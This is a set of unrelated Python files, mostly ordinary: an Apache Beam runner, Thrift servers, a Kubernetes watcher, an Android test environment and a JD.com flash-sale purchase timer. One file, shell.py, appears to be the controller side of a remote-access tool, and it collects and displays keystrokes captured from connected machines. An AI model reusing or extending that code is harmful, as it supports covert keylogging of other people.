env_class = environments.Environment.get_env_cls_from_urn(environment_urn)
return env_class.from_options(portable_options)
def default_job_server(self, options):
raise NotImplementedError(
'You must specify a --job_endpoint when using --runner=PortableRunner. '
'Alternatively, you may specify which portable runner you intend to '
'use, such as --runner=FlinkRunner or --runner=SparkRunner.')
def create_job_service_handle(self, job_service, options):
# type: (...) -> JobServiceHandle
return JobServiceHandle(job_service, options)
def create_job_service(self, options):
# type: (PipelineOptions) -> JobServiceHandle
"""
Start the job service and return a `JobServiceHandle`
"""
job_endpoint = options.view_as(PortableOptions).job_endpoint
if job_endpoint:
if job_endpoint == 'embed':
server = job_server.EmbeddedJobServer() # type: job_server.JobServer
else:
job_server_timeout = options.view_as(PortableOptions).job_server_timeout
server = job_server.ExternalJobServer(job_endpoint, job_server_timeout)
else:
server = self.default_job_server(options)
return self.create_job_service_handle(server.start(), options)
@staticmethod
def get_proto_pipeline(pipeline, options):
# type: (Pipeline, PipelineOptions) -> beam_runner_api_pb2.Pipeline
portable_options = options.view_as(PortableOptions)
proto_pipeline = pipeline.to_runner_api(
default_environment=PortableRunner._create_environment(
portable_options))
# TODO: https://issues.apache.org/jira/browse/BEAM-7199
# Eventually remove the 'pre_optimize' option alltogether and only perform
# the equivalent of the 'default' case below (minus the 'lift_combiners'
# part).
pre_optimize = options.view_as(DebugOptions).lookup_experiment(
'pre_optimize', 'default').lower()
if (not options.view_as(StandardOptions).streaming and
pre_optimize != 'none'):
if pre_optimize == 'default':
phases = [
# TODO: https://issues.apache.org/jira/browse/BEAM-4678
# https://issues.apache.org/jira/browse/BEAM-11478
# Eventually remove the 'lift_combiners' phase from 'default'.
translations.lift_combiners,
translations.sort_stages
]
partial = True
elif pre_optimize == 'all':
phases = [
translations.annotate_downstream_side_inputs,
translations.annotate_stateful_dofns_as_roots,
translations.fix_side_input_pcoll_coders,
translations.pack_combiners,
translations.lift_combiners,
translations.expand_sdf,
translations.fix_flatten_coders,
# translations.sink_flattens,
translations.greedily_fuse,
translations.read_to_impulse,
translations.extract_impulse_stages,
translations.remove_data_plane_ops,
translations.sort_stages
]
partial = False
elif pre_optimize == 'all_except_fusion':
# TODO(BEAM-7248): Delete this branch after PortableRunner supports
# beam:runner:executable_stage:v1.
phases = [
translations.annotate_downstream_side_inputs,
translations.annotate_stateful_dofns_as_roots,
translations.fix_side_input_pcoll_coders,
translations.pack_combiners,
translations.lift_combiners,
translations.expand_sdf,
translations.fix_flatten_coders,
# translations.sink_flattens,
# translations.greedily_fuse,
translations.read_to_impulse,
translations.extract_impulse_stages,
translations.remove_data_plane_ops,
translations.sort_stages
]
partial = True
else:
phases = []
for phase_name in pre_optimize.split(','):
# For now, these are all we allow.
if phase_name in ('pack_combiners', 'lift_combiners'):
phases.append(getattr(translations, phase_name))
else:
raise ValueError(
'Unknown or inapplicable phase for pre_optimize: %s' %
phase_name)
phases.append(translations.sort_stages)
partial = True
# All (known) portable runners (ie Flink and Spark) support these URNs.
known_urns = frozenset([
common_urns.composites.RESHUFFLE.urn,
common_urns.primitives.IMPULSE.urn,
common_urns.primitives.FLATTEN.urn,
common_urns.primitives.GROUP_BY_KEY.urn
])
proto_pipeline = translations.optimize_pipeline(
proto_pipeline,
phases=phases,
known_runner_urns=known_urns,
partial=partial)
return proto_pipeline
def run_pipeline(self, pipeline, options):
# type: (Pipeline, PipelineOptions) -> PipelineResult
portable_options = options.view_as(PortableOptions)
# TODO: https://issues.apache.org/jira/browse/BEAM-5525
# portable runner specific default
if options.view_as(SetupOptions).sdk_location == 'default':
options.view_as(SetupOptions).sdk_location = 'container'
experiments = options.view_as(DebugOptions).experiments or []
# This is needed as we start a worker server if one is requested
# but none is provided.
if portable_options.environment_type == 'LOOPBACK':
use_loopback_process_worker = options.view_as(
DebugOptions).lookup_experiment('use_loopback_process_worker', False)
portable_options.environment_config, server = (
worker_pool_main.BeamFnExternalWorkerPoolServicer.start(
state_cache_size=
sdk_worker_main._get_state_cache_size(experiments),
data_buffer_time_limit_ms=
sdk_worker_main._get_data_buffer_time_limit_ms(experiments),
use_process=use_loopback_process_worker))
cleanup_callbacks = [functools.partial(server.stop, 1)]
else:
cleanup_callbacks = []
proto_pipeline = self.get_proto_pipeline(pipeline, options)
job_service_handle = self.create_job_service(options)
job_id, message_stream, state_stream = \
job_service_handle.submit(proto_pipeline)
result = PipelineResult(
job_service_handle.job_service,
job_id,
message_stream,
state_stream,
cleanup_callbacks)
if cleanup_callbacks:
# Register an exit handler to ensure cleanup on exit.
atexit.register(functools.partial(result._cleanup, on_exit=True))
_LOGGER.info(
'Environment "%s" has started a component necessary for the '
'execution. Be sure to run the pipeline using\n'
' with Pipeline() as p:\n'
' p.apply(..)\n'
'This ensures that the pipeline finishes before this program exits.',
portable_options.environment_type)
return result
class PortableMetrics(metric.MetricResults):
def __init__(self, job_metrics_response):
metrics = job_metrics_response.metrics
self.attempted = portable_metrics.from_monitoring_infos(metrics.attempted)
self.committed = portable_metrics.from_monitoring_infos(metrics.committed)
@staticmethod
def _combine(committed, attempted, filter):
all_keys = set(committed.keys()) | set(attempted.keys())
return [
MetricResult(key, committed.get(key), attempted.get(key))
for key in all_keys if metric.MetricResults.matches(filter, key)
]
def query(self, filter=None):
counters, distributions, gauges = [
self._combine(x, y, filter)
for x, y in zip(self.committed, self.attempted)
]
return {
self.COUNTERS: counters,
self.DISTRIBUTIONS: distributions,
self.GAUGES: gauges
}
class PipelineResult(runner.PipelineResult):
def __init__(
self,
job_service,
job_id,
message_stream,
state_stream,
cleanup_callbacks=()):
super(PipelineResult, self).__init__(beam_job_api_pb2.JobState.UNSPECIFIED)
self._job_service = job_service
self._job_id = job_id
self._messages = []
self._message_stream = message_stream
self._state_stream = state_stream
self._cleanup_callbacks = cleanup_callbacks
self._metrics = None
self._runtime_exception = None
def cancel(self):
# type: () -> None
try:
self._job_service.Cancel(
beam_job_api_pb2.CancelJobRequest(job_id=self._job_id))
finally:
self._cleanup()
@property
def state(self):
runner_api_state = self._job_service.GetState(
beam_job_api_pb2.GetJobStateRequest(job_id=self._job_id)).state
self._state = self._runner_api_state_to_pipeline_state(runner_api_state)
return self._state
@staticmethod
def _runner_api_state_to_pipeline_state(runner_api_state):
return getattr(
runner.PipelineState,
beam_job_api_pb2.JobState.Enum.Name(runner_api_state))
@staticmethod
def _pipeline_state_to_runner_api_state(pipeline_state):
return beam_job_api_pb2.JobState.Enum.Value(pipeline_state)
def metrics(self):
if not self._metrics:
job_metrics_response = self._job_service.GetJobMetrics(
beam_job_api_pb2.GetJobMetricsRequest(job_id=self._job_id))
self._metrics = PortableMetrics(job_metrics_response)
return self._metrics
def _last_error_message(self):
# type: () -> str
# Filter only messages with the "message_response" and error messages.
messages = [
m.message_response for m in self._messages
if m.HasField('message_response')
]
error_messages = [
m for m in messages
if m.importance == beam_job_api_pb2.JobMessage.JOB_MESSAGE_ERROR
]
if error_messages:
return error_messages[-1].message_text
else:
return 'unknown error'
def wait_until_finish(self, duration=None):
"""
:param duration: The maximum time in milliseconds to wait for the result of
the execution. If None or zero, will wait until the pipeline finishes.
:return: The result of the pipeline, i.e. PipelineResult.
"""
def read_messages():
# type: () -> None
previous_state = -1
for message in self._message_stream:
if message.HasField('message_response'):
logging.log(
MESSAGE_LOG_LEVELS[message.message_response.importance],
"%s",
message.message_response.message_text)
else:
current_state = message.state_response.state
if current_state != previous_state:
_LOGGER.info(
"Job state changed to %s",
self._runner_api_state_to_pipeline_state(current_state))
previous_state = current_state
self._messages.append(message)
message_thread = threading.Thread(
target=read_messages, name='wait_until_finish_read')
message_thread.daemon = True
message_thread.start()
if duration:
state_thread = threading.Thread(
target=functools.partial(self._observe_state, message_thread),
name='wait_until_finish_state_observer')
state_thread.daemon = True
state_thread.start()
start_time = time.time()
duration_secs = duration / 1000
while (time.time() - start_time < duration_secs and
state_thread.is_alive()):
time.sleep(1)
else:
self._observe_state(message_thread)
if self._runtime_exception:
raise self._runtime_exception
return self._state
def _observe_state(self, message_thread):
try:
for state_response in self._state_stream:
self._state = self._runner_api_state_to_pipeline_state(
state_response.state)
if state_response.state in TERMINAL_STATES:
# Wait for any last messages.
message_thread.join(10)
break
if self._state != runner.PipelineState.DONE:
self._runtime_exception = RuntimeError(
'Pipeline %s failed in state %s: %s' %
(self._job_id, self._state, self._last_error_message()))
except Exception as e:
self._runtime_exception = e
finally:
self._cleanup()
def _cleanup(self, on_exit=False):
# type: (bool) -> None
if on_exit and self._cleanup_callbacks:
_LOGGER.info(
'Running cleanup on exit. If your pipeline should continue running, '
'be sure to use the following syntax:\n'
' with Pipeline() as p:\n'
' p.apply(..)\n'
'This ensures that the pipeline finishes before this program exits.')
has_exception = None
for callback in self._cleanup_callbacks:
try:
callback()
except Exception:
has_exception = True
self._cleanup_callbacks = ()
if has_exception:
raise
|
shell.py
|
# Date: 06/05/2018
# Author: Pure-L0G1C
# Description: Recv/Send to master
import sys
import time
from queue import Queue
from threading import Thread, RLock
class Shell(object):
def __init__(self, sess_obj, interface):
self.interface = interface
self.keylogging = False
self.keystrokes = None
self.sess = sess_obj
self.is_alive = True
self.recv = Queue()
self.lock = RLock()
def start(self):
t1 = Thread(target=self.listen)
t2 = Thread(target=self.recv_manager)
t1.daemon = True
t2.daemon = True
t1.start()
t2.start()
t1.join()
t2.join()
def listen(self):
while self.is_alive:
recv = self.sess.recv()
if recv:
self.recv.put(recv)
else:
self.is_alive = False
self.interface.disconnect_client(self.sess)
def recv_manager(self):
while self.is_alive:
if self.recv.qsize():
with self.lock:
recv = self.recv.get()
if recv['code'] == -0:
self.keystrokes = recv['args']
self.display_text('Data: {}'.format(recv['args']))
def send(self, code=None, args=None):
self.sess.send(code=code, args=args)
def display_text(self, text):
print('{0}{1}{0}'.format('\n\n\t', text))
|
env.py
|
import argparse
import logging
import os
import sys
import random
import time
from datetime import datetime
import gym
from gym import spaces, logger
from gym.utils import seeding
import numpy as np
from droidbot import Device, App
from droidbot.rl.observation import Observation
from droidbot.rl.action import Action
from droidbot import monitor
from droidbot.rl.RL_test import DQN
class TestEnv(gym.Env):
"""
Description:
An app under test is running in an Android device.
The agent will observe:
1. the UI
2. the current process status, e.g. listening broadcast receivers,
recently executed APIs, recently printed logs, etc.
The agent can interact with the device by:
1. sending a gesture
2. sending a broadcast intent
3. pressing a key
The goal is to trigger as many sensitive behaviors in the app as possible in one episode.
Observation: defined in observation.py
Action: defined in action.py
Reward:
Reward is 1 for every sensitive behavior detected.
A sensitive behavior is uniquely identified based on the API name (and the stack trace?).
Starting State:
All initial observations are obtained right after the app is installed and started.
Episode Termination:
Step limit is exceeded.
Timeout.
"""
metadata = {
'episode.step_limit': 200, # maximum number of steps in an episode
'episode.timeout': 600, # maximum duration of an episode
'step.n_events': 1, # number of events per step
'step.wait': 0, # time in seconds to wait after each input event
}
def __init__(self, apk_dir, device_serial=None, output_dir='output'):
self.logger = logging.getLogger('TestEnv')
self.observation_space = Observation.get_space()
self.action_space = Action.get_space()
self.seed_ = self.seed()
self.viewer = None
# add by wangsonghe
self.current_app = None
self.monitor_thread = None
self.device = Device(device_serial=device_serial, output_dir=output_dir)
self.apk_files = self._get_apk_files(apk_dir)
self.output_dir = output_dir
def seed(self, seed=None):
self.np_random, seed = seeding.np_random(seed)
return [seed]
def reset(self, app_idx=None):
"""
reset the current environment by starting the app on the device
:return: the initial observation
"""
# make sure the device is connected
self.device.wait_for_device()
self._close_episode()
# get a random app as the current app
if app_idx is None:
app_idx = self.np_random.randint(0, len(self.apk_files))
self.current_app = App(self.apk_files[app_idx])
self.executed_APIs = []
self.sensitive_behaviors = []
self.n_steps = 0
self.start_time = datetime.now()
self.running = True
self.observation = Observation(self.device, self.current_app)
#wsh
# install the current app
self.device.install_app(self.current_app)
import threading
self.monitor_thread = threading.Thread(target=self._monitor_APIs)
self.monitor_thread.start()
# start the current app on the device
self.device.start_app(self.current_app)
time.sleep(3)
self.device.droidbot_app.connect()
# get current observation
return self.observation.observe(self)
def render(self, mode='human'):
if mode == 'human':
from gym.envs.classic_control import rendering
if self.viewer is None:
self.viewer = rendering.SimpleImageViewer()
print(self.device.get_current_state().to_dict())
#self.viewer.imshow(self.device.get_current_state())
return self.viewer.isopen
def step(self, action):
n_events = self.metadata['step.n_events']
n_existing_sensitive_behaviors = len(self.sensitive_behaviors)
event_generator = Action.get_event_generator(action)
for i in range(n_events):
event = event_generator.gen_event()
self.device.send_event(event)
time.sleep(self.metadata['step.wait'])
obs = self.observation.observe(self)
self.executed_APIs = [] # reset interested_apis list
time.sleep(2) #wait for monitor
reward = len(self.sensitive_behaviors) - n_existing_sensitive_behaviors
done = False
if self.n_steps > self.metadata['episode.step_limit']:
done = True
elif (datetime.now() - self.start_time).total_seconds() > self.metadata['episode.timeout']:
done = True
info = {} # put any useful information in this dict
return obs, reward, done, info
def close(self):
self.reset()
self.device.disconnect()
pass
def _get_apk_files(self, apk_dir):
apk_files = []
for dir_path, dir_names, file_names in os.walk(apk_dir):
for file_name in file_names:
if file_name.lower().endswith('.apk'):
apk_files.append(os.path.join(dir_path, file_name))
return apk_files
def _close_episode(self):
# uninstall the current app
self.running = False
if self.current_app is not None:
self.device.uninstall_app(self.current_app)
if self.monitor_thread is not None:
# wait for the monitor thread to finish
time.sleep(1)
def _monitor_APIs(self):
# TODO @Songhe monitor the app and maintain self.executed_APIs and self.sensitive_behaviors
self.monitor = monitor.Monitor()
self.monitor.serial = self.device.serial
self.monitor.packageName = self.current_app.get_package_name()
self.monitor.set_up()
while self.running:
self.monitor.check_env()
time.sleep(5)
self.sensitive_behaviors += self.monitor.get_sensitive_api()
self.executed_APIs = self.monitor.get_interested_api()
pass
self.monitor.stop()
def parse_args():
"""
Parse command line input
:return:
"""
parser = argparse.ArgumentParser(description="DroidBot RL environment.")
parser.add_argument("-a", action="store", dest="apk_dir", required=True,
help="The directory of apps to test")
parser.add_argument("-d", action="store", dest="device_serial", required=False, default=None,
help="The serial number of target device (use `adb devices` to find)")
parser.add_argument("-o", action="store", dest="output_dir",
help="directory of output")
args, unknown = parser.parse_known_args()
return args
def main():
args = parse_args()
env = TestEnv(apk_dir=args.apk_dir, device_serial=args.device_serial)
env.reset()
for _ in range(100):
# env.render()
env.step(env.action_space.sample()) # take a random action
env.close()
# dqn_agent = DQN(env, time_steps=4)
# dqn_agent.train(max_episodes=50)
if __name__ == '__main__':
main()
|
timer.py
|
# -*- coding:utf-8 -*-
# import gevent
# from gevent import monkey; monkey.patch_all()
import threading
import json
import os
import platform
import random
import time
from datetime import datetime, timedelta
import requests
from log import logger
class Timer(object):
def __init__(self, buy_time, sleep_interval=1, fast_sleep_interval=0.01, is_sync=True, assistant=None):
# 同步京东服务器时间
if is_sync is True:
Timer.setSystemTime()
# '2018-09-28 22:45:50.000'
self.buy_time = datetime.strptime(buy_time, "%Y-%m-%d %H:%M:%S.%f")
self.fast_buy_time = self.buy_time + timedelta(seconds=-3)
self.concurrent_time = self.buy_time + timedelta(seconds=-20)
self.connect_time = self.buy_time + timedelta(seconds=-45)
self.sleep_interval = sleep_interval
self.fast_sleep_interval = fast_sleep_interval
self.buy_time_timestamp = self.buy_time.timestamp()
self.fast_buy_time_timestamp = self.fast_buy_time.timestamp()
self.concurrent_time_timestamp = self.concurrent_time.timestamp()
self.connect_time_timestamp = self.connect_time.timestamp()
self.is_connected = False
self.now_time = time.time
self.assistant = assistant
self.fast_mode = assistant.config.fast_mode
if self.fast_mode:
assistant.make_seckill_connect()
def start(self):
logger.info('正在等待到达设定时间:%s' % self.buy_time)
check_timestamp = None
assistant = self.assistant
buy_time_timestamp = self.buy_time.timestamp()
fast_buy_time_timestamp = self.fast_buy_time_timestamp
concurrent_time_timestamp = self.concurrent_time_timestamp
connect_time_timestamp = self.connect_time_timestamp
fast_sleep_interval = self.fast_sleep_interval
sleep_interval = self.sleep_interval
while True:
now = self.now_time()
if now > buy_time_timestamp:
# 超时后在主线程执行,不会启用并发
logger.info('时间超出,开始执行')
self.assistant.start_func()
return None
# 临时修改,默认开启并发
# break
else:
if now > fast_buy_time_timestamp:
if self.is_connected:
time.sleep(fast_sleep_interval)
# else:
# if now_time() > connect_time_timestamp and sock_conn_func is not None:
# if self.fast_mode:
# assistant.connect_now()
# self.is_connected = True
elif now > concurrent_time_timestamp:
logger.info('时间接近,开启%s并发倒计时', assistant.concurrent_count)
break
elif now > connect_time_timestamp:
if not self.is_connected and self.fast_mode:
assistant.connect_now()
self.is_connected = True
else:
time.sleep(sleep_interval)
else:
# 保活
if self.fast_mode:
if check_timestamp is None:
check_timestamp = now + 1800 + random.randint(-10, 10)
elif now > check_timestamp:
if assistant._validate_cookies() is True:
check_timestamp = None
logger.info("账户在线状态检查正常")
else:
logger.error("账户已离线,请重新登录!")
exit(-1)
time.sleep(sleep_interval)
# 开启协程
# for i in range(assistant.concurrent_count):
# assistant.concurrent_gevent_array.append(gevent.spawn(self.ready_call))
# gevent.joinall(assistant.concurrent_gevent_array)
# 开启线程
thread_list = []
for i in range(assistant.concurrent_count):
t = threading.Thread(target=self.ready_call)
t.start()
thread_list.append(t)
for t in thread_list:
t.join()
def ready_call(self):
while True:
now = self.now_time()
if now > self.buy_time_timestamp:
logger.info('时间到达,开始执行')
self.assistant.start_func()
break
else:
if self.is_connected:
time.sleep(self.fast_sleep_interval)
# else:
# if now_time() > connect_time_timestamp and sock_conn_func is not None:
# if self.fast_mode:
# self.is_connected = True
# self.assistant.connect_now()
@staticmethod
def setSystemTime():
url = 'https://api.m.jd.com/client.action?functionId=queryMaterialProducts&client=wh5'
try:
session = requests.session()
# get server time
t0 = datetime.now()
ret = session.get(url).text
t1 = datetime.now()
if not ret:
logger.error('同步京东服务器时间失败,时间同步接口已失效')
return
js = json.loads(ret)
t = float(js["currentTime2"]) / 1000
dt = datetime.fromtimestamp(t) + ((t1 - t0) / 2)
sys = platform.system()
if sys == "Windows":
import win_util
win_util.setWinSystemTime(dt)
elif sys == "Linux":
os.system(f'date -s "{dt.strftime("%Y-%m-%d %H:%M:%S.%f000")}"')
logger.info('已同步京东服务器时间:%s' % dt)
except Exception as e:
logger.error('同步京东服务器时间失败,请检查权限')
logger.error(e)
|
TServer.py
|
#!/usr/bin/env python
#
# Copyright (c) 2006- Facebook
# Distributed under the Thrift Software License
#
# See accompanying file LICENSE or visit the Thrift site at:
# http://developers.facebook.com/thrift/
import sys
import traceback
import threading
import Queue
from thrift.Thrift import TProcessor
from thrift.transport import TTransport
from thrift.protocol import TBinaryProtocol
class TServer:
"""Base interface for a server, which must have a serve method."""
""" 3 constructors for all servers:
1) (processor, serverTransport)
2) (processor, serverTransport, transportFactory, protocolFactory)
3) (processor, serverTransport,
inputTransportFactory, outputTransportFactory,
inputProtocolFactory, outputProtocolFactory)"""
def __init__(self, *args):
if (len(args) == 2):
self.__initArgs__(args[0], args[1],
TTransport.TTransportFactoryBase(),
TTransport.TTransportFactoryBase(),
TBinaryProtocol.TBinaryProtocolFactory(),
TBinaryProtocol.TBinaryProtocolFactory())
elif (len(args) == 4):
self.__initArgs__(args[0], args[1], args[2], args[2], args[3], args[3])
elif (len(args) == 6):
self.__initArgs__(args[0], args[1], args[2], args[3], args[4], args[5])
def __initArgs__(self, processor, serverTransport,
inputTransportFactory, outputTransportFactory,
inputProtocolFactory, outputProtocolFactory):
self.processor = processor
self.serverTransport = serverTransport
self.inputTransportFactory = inputTransportFactory
self.outputTransportFactory = outputTransportFactory
self.inputProtocolFactory = inputProtocolFactory
self.outputProtocolFactory = outputProtocolFactory
def serve(self):
pass
class TSimpleServer(TServer):
"""Simple single-threaded server that just pumps around one transport."""
def __init__(self, *args):
TServer.__init__(self, *args)
def serve(self):
self.serverTransport.listen()
while True:
client = self.serverTransport.accept()
itrans = self.inputTransportFactory.getTransport(client)
otrans = self.outputTransportFactory.getTransport(client)
iprot = self.inputProtocolFactory.getProtocol(itrans)
oprot = self.outputProtocolFactory.getProtocol(otrans)
try:
while True:
self.processor.process(iprot, oprot)
except TTransport.TTransportException, tx:
pass
except Exception, x:
print '%s, %s, %s' % (type(x), x, traceback.format_exc())
itrans.close()
otrans.close()
class TThreadedServer(TServer):
"""Threaded server that spawns a new thread per each connection."""
def __init__(self, *args):
TServer.__init__(self, *args)
def serve(self):
self.serverTransport.listen()
while True:
try:
client = self.serverTransport.accept()
t = threading.Thread(target = self.handle, args=(client,))
t.start()
except KeyboardInterrupt:
raise
except Exception, x:
print '%s, %s, %s,' % (type(x), x, traceback.format_exc())
def handle(self, client):
itrans = self.inputTransportFactory.getTransport(client)
otrans = self.outputTransportFactory.getTransport(client)
iprot = self.inputProtocolFactory.getProtocol(itrans)
oprot = self.outputProtocolFactory.getProtocol(otrans)
try:
while True:
self.processor.process(iprot, oprot)
except TTransport.TTransportException, tx:
pass
except Exception, x:
print '%s, %s, %s' % (type(x), x, traceback.format_exc())
itrans.close()
otrans.close()
class TThreadPoolServer(TServer):
"""Server with a fixed size pool of threads which service requests."""
def __init__(self, *args):
TServer.__init__(self, *args)
self.clients = Queue.Queue()
self.threads = 10
def setNumThreads(self, num):
"""Set the number of worker threads that should be created"""
self.threads = num
def serveThread(self):
"""Loop around getting clients from the shared queue and process them."""
while True:
try:
client = self.clients.get()
self.serveClient(client)
except Exception, x:
print '%s, %s, %s' % (type(x), x, traceback.format_exc())
def serveClient(self, client):
"""Process input/output from a client for as long as possible"""
itrans = self.inputTransportFactory.getTransport(client)
otrans = self.outputTransportFactory.getTransport(client)
iprot = self.inputProtocolFactory.getProtocol(itrans)
oprot = self.outputProtocolFactory.getProtocol(otrans)
try:
while True:
self.processor.process(iprot, oprot)
except TTransport.TTransportException, tx:
pass
except Exception, x:
print '%s, %s, %s' % (type(x), x, traceback.format_exc())
itrans.close()
otrans.close()
def serve(self):
"""Start a fixed number of worker threads and put client into a queue"""
for i in range(self.threads):
try:
t = threading.Thread(target = self.serveThread)
t.start()
except Exception, x:
print '%s, %s, %s,' % (type(x), x, traceback.format_exc())
# Pump the socket for clients
self.serverTransport.listen()
while True:
try:
client = self.serverTransport.accept()
self.clients.put(client)
except Exception, x:
print '%s, %s, %s' % (type(x), x, traceback.format_exc())
|
reflector.py
|
# specifically use concurrent.futures for threadsafety
# asyncio Futures cannot be used across threads
from concurrent.futures import Future
from functools import partial
import json
import time
import threading
from traitlets.config import LoggingConfigurable
from traitlets import Any, Bool, Dict, Int, Unicode
from kubernetes import config, watch
# This is kubernetes client implementation specific, but we need to know
# whether it was a network or watch timeout.
from urllib3.exceptions import ReadTimeoutError
from .clients import shared_client
class ResourceReflector(LoggingConfigurable):
"""Base class for keeping a local up-to-date copy of a set of
kubernetes resources.
Must be subclassed once per kind of resource that needs watching, but
in general you should subclass either NamespacedResourceReflector or
MultiNamespaceResourceReflector, depending on whether you are using
per-user namespaces or not.
"""
labels = Dict(
{},
config=True,
help="""
Labels to reflect onto local cache
"""
)
fields = Dict(
{},
config=True,
help="""
Fields to restrict the reflected objects
"""
)
resources = Dict(
{},
help="""
Dictionary of resource names to the appropriate resource objects.
This can be accessed across threads safely.
"""
)
kind = Unicode(
'resource',
help="""
Human readable name for kind of object we're watching for.
Used for diagnostic messages.
"""
)
omit_namespace = Bool(
False,
config=True,
help="""
Set this to true if the reflector is to operate across
multiple namespaces. This is set by both the
MultiNamespaceResourceReflector and
NamespacedResourceReflector subclasses, so you probably do not
have to set it yourself.
""",
)
namespace = Unicode(
None,
allow_none=True,
help="""
Namespace to watch for resources in; leave at 'None' for
MultiNamespaceResourceReflectors.
""",
)
list_method_name = Unicode(
"",
help="""
Name of function (on apigroup respresented by
`api_group_name`) that is to be called to list resources.
This will be passed a a label selector.
If self.omit_namespace is False (and this class is a
NamespacedResourceReflector), you want something of the form
list_namespaced_<resource> - for example,
`list_namespaced_pod` will give you a PodReflector. It will take
its namespace from self.namespace (which therefore should not be
None).
If self.omit_namespace is True (and this class is a
MultiNamespaceResourceReflector), you want
list_<resource>_for_all_namespaces.
This must be set by a subclass.
"""
)
api_group_name = Unicode(
'CoreV1Api',
help="""
Name of class that represents the apigroup on which
`list_method_name` is to be found.
Defaults to CoreV1Api, which has everything in the 'core' API group. If you want to watch Ingresses,
for example, you would have to use ExtensionsV1beta1Api
"""
)
request_timeout = Int(
60,
config=True,
help="""
Network timeout for kubernetes watch.
Trigger watch reconnect when a given request is taking too long,
which can indicate network issues.
"""
)
timeout_seconds = Int(
10,
config=True,
help="""
Timeout for kubernetes watch.
Trigger watch reconnect when no watch event has been received.
This will cause a full reload of the currently existing resources
from the API server.
"""
)
restart_seconds = Int(
30,
config=True,
help="""
Maximum time before restarting a watch.
The watch will be restarted at least this often,
even if events are still arriving.
Avoids trusting kubernetes watch to yield all events,
which seems to not be a safe assumption.
""")
on_failure = Any(
help="""Function to be called when the reflector gives up.""")
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
# Load kubernetes config here, since this is a Singleton and
# so this __init__ will be run way before anything else gets run.
try:
config.load_incluster_config()
except config.ConfigException:
config.load_kube_config()
self.api = shared_client(self.api_group_name)
# FIXME: Protect against malicious labels?
self.label_selector = ','.join(
['{}={}'.format(k, v) for k, v in self.labels.items()])
self.field_selector = ','.join(
['{}={}'.format(k, v) for k, v in self.fields.items()])
self.first_load_future = Future()
self._stop_event = threading.Event()
self.start()
def __del__(self):
self.stop()
def _list_and_update(self):
"""
Update current list of resources by doing a full fetch.
Overwrites all current resource info.
"""
initial_resources = None
if self.omit_namespace:
initial_resources = getattr(self.api, self.list_method_name)(
label_selector=self.label_selector,
field_selector=self.field_selector,
_request_timeout=self.request_timeout,
_preload_content=False,
)
else:
initial_resources = getattr(self.api, self.list_method_name)(
self.namespace,
label_selector=self.label_selector,
field_selector=self.field_selector,
_request_timeout=self.request_timeout,
_preload_content=False,
)
# This is an atomic operation on the dictionary!
initial_resources = json.loads(initial_resources.read())
self.resources = {
f'{p["metadata"]["namespace"]}/{ p["metadata"]["name"]}': p for p in initial_resources["items"]}
# return the resource version so we can hook up a watch
return initial_resources["metadata"]["resourceVersion"]
def _watch_and_update(self):
"""
Keeps the current list of resources up-to-date
This method is to be run not on the main thread!
We first fetch the list of current resources, and store that. Then we
register to be notified of changes to those resources, and keep our
local store up-to-date based on these notifications.
We also perform exponential backoff, giving up after we hit 32s
wait time. This should protect against network connections dropping
and intermittent unavailability of the api-server. Every time we
recover from an exception we also do a full fetch, to pick up
changes that might've been missed in the time we were not doing
a watch.
Note that we're playing a bit with fire here, by updating a dictionary
in this thread while it is probably being read in another thread
without using locks! However, dictionary access itself is atomic,
and as long as we don't try to mutate them (do a 'fetch / modify /
update' cycle on them), we should be ok!
"""
selectors = []
log_name = ""
if self.label_selector:
selectors.append("label selector=%r" % self.label_selector)
if self.field_selector:
selectors.append("field selector=%r" % self.field_selector)
log_selector = ', '.join(selectors)
cur_delay = 0.1
if self.omit_namespace:
ns_str = "all namespaces"
else:
ns_str = "namespace {}".format(self.namespace)
self.log.info(
"watching for %s with %s in %s",
self.kind,
log_selector,
ns_str,
)
while True:
self.log.debug("Connecting %s watcher", self.kind)
start = time.monotonic()
w = watch.Watch()
try:
resource_version = self._list_and_update()
if not self.first_load_future.done():
# signal that we've loaded our initial data
self.first_load_future.set_result(None)
watch_args = {
"label_selector": self.label_selector,
"field_selector": self.field_selector,
"resource_version": resource_version,
}
if not self.omit_namespace:
watch_args["namespace"] = self.namespace
if self.request_timeout:
# set network receive timeout
watch_args['_request_timeout'] = self.request_timeout
if self.timeout_seconds:
# set watch timeout
watch_args['timeout_seconds'] = self.timeout_seconds
method = partial(
getattr(self.api, self.list_method_name), _preload_content=False)
# in case of timeout_seconds, the w.stream just exits (no exception thrown)
# -> we stop the watcher and start a new one
for watch_event in w.stream(
method,
**watch_args
):
# Remember that these events are k8s api related WatchEvents
# objects, not k8s Event or Pod representations, they will
# reside in the WatchEvent's object field depending on what
# kind of resource is watched.
#
# ref: https://kubernetes.io/docs/reference/generated/kubernetes-api/v1.16/#watchevent-v1-meta
# ref: https://kubernetes.io/docs/reference/generated/kubernetes-api/v1.16/#event-v1-core
cur_delay = 0.1
resource = watch_event['object']
ref_key = "{}/{}".format(resource["metadata"]["namespace"],
resource["metadata"]["name"])
if watch_event['type'] == 'DELETED':
# This is an atomic delete operation on the dictionary!
self.resources.pop(ref_key, None)
else:
# This is an atomic operation on the dictionary!
self.resources[ref_key] = resource
if self._stop_event.is_set():
self.log.info("%s watcher stopped", self.kind)
break
watch_duration = time.monotonic() - start
if watch_duration >= self.restart_seconds:
self.log.debug(
"Restarting %s watcher after %i seconds",
self.kind, watch_duration,
)
break
except ReadTimeoutError:
# network read time out, just continue and restart the watch
# this could be due to a network problem or just low activity
self.log.warning(
"Read timeout watching %s, reconnecting", self.kind)
continue
except Exception:
cur_delay = cur_delay * 2
if cur_delay > 30:
self.log.exception(
"Watching resources never recovered, giving up")
if self.on_failure:
self.on_failure()
return
self.log.exception(
"Error when watching resources, retrying in %ss", cur_delay)
time.sleep(cur_delay)
continue
else:
# no events on watch, reconnect
self.log.debug("%s watcher timeout", self.kind)
finally:
w.stop()
if self._stop_event.is_set():
self.log.info("%s watcher stopped", self.kind)
break
self.log.warning("%s watcher finished", self.kind)
def start(self):
"""
Start the reflection process!
We'll do a blocking read of all resources first, so that we don't
race with any operations that are checking the state of the pod
store - such as polls. This should be called only once at the
start of program initialization (when the singleton is being created),
and not afterwards!
"""
if hasattr(self, 'watch_thread'):
raise ValueError(
'Thread watching for resources is already running')
self._list_and_update()
self.watch_thread = threading.Thread(target=self._watch_and_update)
# If the watch_thread is only thread left alive, exit app
self.watch_thread.daemon = True
self.watch_thread.start()
def stop(self):
self._stop_event.set()
def stopped(self):
return self._stop_event.is_set()
class NamespacedResourceReflector(ResourceReflector):
"""
